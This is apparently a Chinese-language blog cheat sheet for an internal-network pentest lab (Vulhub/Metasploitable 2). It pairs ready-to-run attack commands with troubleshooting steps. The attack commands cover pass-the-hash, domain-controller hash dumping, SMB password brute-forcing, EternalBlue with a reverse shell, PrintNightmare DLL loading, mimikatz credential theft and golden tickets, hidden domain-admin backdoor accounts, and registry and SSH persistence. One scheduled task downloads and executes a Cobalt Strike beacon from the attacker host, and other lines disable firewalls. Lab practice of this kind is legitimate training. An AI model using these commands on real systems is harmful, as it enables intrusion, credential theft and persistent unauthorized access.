内网渗透靶场 攻击 & 排错命令分类速查表

本速查表按工具类型 + 功能场景分类,整合攻击命令与对应排错方案,适配 Vulhub+Metasploitable 2 靶场,方便快速检索调用。

一、 信息收集类工具

工具 攻击命令(信息探测) 对应排错命令(探测失败)
nmap 1. 隐蔽端口扫描(规避防火墙)nmap -sS -Pn -p 135,139,445,3389 192.168.56.0/24 -oG result.txt2. 版本探测nmap -sV -p 445 192.168.56.104 1. 检查攻击机与靶机网络连通性ping 192.168.56.1042. 靶机关闭防火墙(测试用)sudo ufw disable(Linux)netsh advfirewall set allprofiles state off(Windows)
arp-scan 内网存活主机探测arp-scan -l 1. 确认网卡模式为 Host-Onlyip a(Kali)2. 检查是否在同一网段route -n
BloodHound 域权限关系可视化bloodhound-python -u user1 -p P@ssw0rd! -d test.com -dc 192.168.56.103 1. 验证域账户权限net user user1 /domain2. 检查域控制器 LDAP 端口(389)是否开放nc -zv 192.168.56.103 389
系统内置命令 Windows 域信息查询net user /domain``nltest /dclist:test.comLinux SUID 文件查询find / -perm -u+s -type f 2>/dev/null 1. Windows 权限不足排错whoami /priv2. Linux 命令无结果排错sudo find / -perm -u+s -type f 2>/dev/null

二、 横向移动类工具

工具 攻击命令(横向渗透) 对应排错命令(移动失败)
Impacket 1. PTH 哈希传递python3 psexec.py test.com/user1@192.168.56.104 -hashes LM哈希:NTLM哈希2. WMI 远程执行python3 wmiexec.py test.com/admin@192.168.56.103 -p P@ssw0rd! "whoami"3. 提取域控哈希python3 secretsdump.py test.com/admin@192.168.56.103 -just-dc-ntlm 1. 检查 Impacket 安装pip3 show impacket2. 验证凭证有效性crackmapexec smb 192.168.56.104 -u user1 -H NTLM哈希3. 检查目标 SMB 服务状态sc query lanmanserver(Windows 靶机)
CrackMapExec SMB 弱口令批量爆破crackmapexec smb 192.168.56.0/24 -u userlist.txt -p passlist.txt --continue-on-success 1. 检查字典文件路径是否正确ls -l userlist.txt2. 靶机 SMB 端口是否开放`netstat -ano findstr 445`(Windows)
evil-winrm WinRM 远程登录evil-winrm -i 192.168.56.104 -u user1 -p P@ssw0rd! 1. 检查靶机 WinRM 服务是否开启winrm quickconfig(靶机执行)2. 测试 5985 端口连通性nc -zv 192.168.56.104 5985

三、 漏洞利用类工具

工具 攻击命令(漏洞攻击) 对应排错命令(攻击失败)
Metasploit 1. 永恒之蓝(MS17-010)利用msfconsole``use exploit/windows/smb/ms17_010_eternalblue``set RHOSTS 192.168.56.104``set PAYLOAD windows/x64/meterpreter/reverse_tcp``set LHOST 192.168.56.101``run2. 内网漏洞批量扫描use auxiliary/scanner/smb/smb_ms17_010``set RHOSTS 192.168.56.0/24``run 1. 检查靶机是否已打补丁`systeminfo findstr "KB4013389"(Windows)<br>2. 匹配 payload 系统架构<br>show payloads(查看支持的 payload 类型)<br>3. 攻击机 LHOST 非回环地址<br>ip a`(确认 LHOST 是内网 IP)
PrintNightmare 工具 打印服务提权git clone https://github.com/cube0x0/CVE-2021-34527.git``cd CVE-2021-34527 && make``impacket-smbserver share . -smb2support``CVE-2021-34527.exe '\\192.168.56.101\share\malicious.dll' 1. 检查 SMB 共享是否可访问net use \\192.168.56.101\share(靶机执行)2. 验证靶机是否存在漏洞`systeminfo findstr "KB5004945"`

四、 凭证攻击类工具

工具 攻击命令(凭证利用) 对应排错命令(利用失败)
mimikatz 1. PTH 哈希注入mimikatz.exe "sekurlsa::pth /user:user1 /domain:test.com /ntlm:哈希值" exit2. 黄金票据生成mimikatz.exe "kerberos::golden /domain:test.com /sid:S-1-5-21-xxx /krbtgt:哈希 /user:backdoor /ptt" exit3. 提取内存哈希mimikatz.exe "sekurlsa::logonpasswords" exit 1. 检查是否以管理员权限运行whoami(确认是 Administrator)2. 验证域 SID 正确性whoami /user(靶机执行)3. 禁用 NTLM 时切换 PTT 攻击reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LmCompatibilityLevel
Rubeus 提取 TGT 票据Rubeus.exe asktgt /user:user1 /domain:test.com /password:P@ssw0rd! /outfile:tgt.kirbi 1. 检查域控制器 88 端口(Kerberos)是否开放nc -zv 192.168.56.103 882. 验证账户密码正确性crackmapexec smb 192.168.56.103 -u user1 -p P@ssw0rd!
LaZagne 敏感密码提取lazagne.exe all(Windows)lazagne linux all(Linux) 1. 权限不足时提权后执行run post/multi/recon/local_exploit_suggester(Meterpreter 内)2. 部分密码无法提取时检查系统版本systeminfo

五、 持久化类工具

工具 攻击命令(后门留痕) 对应排错命令(后门失效)
系统内置命令 1. Windows 隐藏账户net user hidden_admin$ P@ssw0rd! /add /domain``net group "Domain Admins" hidden_admin$ /add /domain2. 注册表启动项后门reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Update /t REG_SZ /d "C:\backdoor.exe" /f3. Linux SSH 密钥持久化ssh-keygen -t rsa -f backdoor_key``echo "公钥内容" >> /home/user1/.ssh/authorized_keys 1. 检查隐藏账户权限net user hidden_admin$ /domain2. 注册表项是否创建成功reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Update3. SSH 密钥权限是否正确chmod 600 /home/user1/.ssh/authorized_keys(靶机执行)
Cobalt Strike 计划任务持久化schtasks /create /tn "SysUpdate" /tr "powershell -c IEX (New-Object Net.WebClient).DownloadString('http://192.168.56.101/beacon.ps1')" /sc daily /st 00:00 1. 检查 Beacon 监听是否正常`netstat -ano findstr 8080(攻击机)<br>2. 靶机是否能访问攻击机 IP<br>ping 192.168.56.101`

六、 通用排错工具

工具 排错命令(通用问题) 适用场景
系统命令 Windows 日志查看wevtutil qe Security /f:text``eventvwr.mscLinux 日志查看`cat /var/log/auth.log grep "Failed"` 登录失败、后门被查杀
网络工具 端口连通性测试telnet 192.168.56.104 445``nc -zv 192.168.56.103 3389 横向移动提示 "拒绝访问"
工具更新 Kali 工具升级apt update && apt upgrade -y``msfupdate 工具报错 "模块不存在"
相关推荐
信仰JR2 小时前
Linux系统安装Maven私服Nexus3.X
linux·运维·maven
scan7242 小时前
python mcp 打印出参数
linux·服务器·数据库
深耕AI2 小时前
【CUDA安装报错?】Nsight Visual Studio Edition安装失败《终极解决方法》
windows·经验分享·gpu算力
KingRumn2 小时前
Linux进程间通信System V IPC 与 POSIX IPC 跨平台兼容性分析
linux·运维
IT运维爱好者2 小时前
【Linux】抓包工具mtr命令的使用教程
linux·mtr
d111111111d2 小时前
在STM32中,中断服务函数的命名有什么要求?
笔记·stm32·单片机·嵌入式硬件·学习·c#
running up2 小时前
Java集合框架之ArrayList与LinkedList详解
javascript·ubuntu·typescript
总有刁民想爱朕ha2 小时前
Windows Server 2019部署MySQL 8教程
数据库·windows·mysql
JiMoKuangXiangQu2 小时前
Linux 内存管理:TLB ASID
linux·内存管理·tlb·asid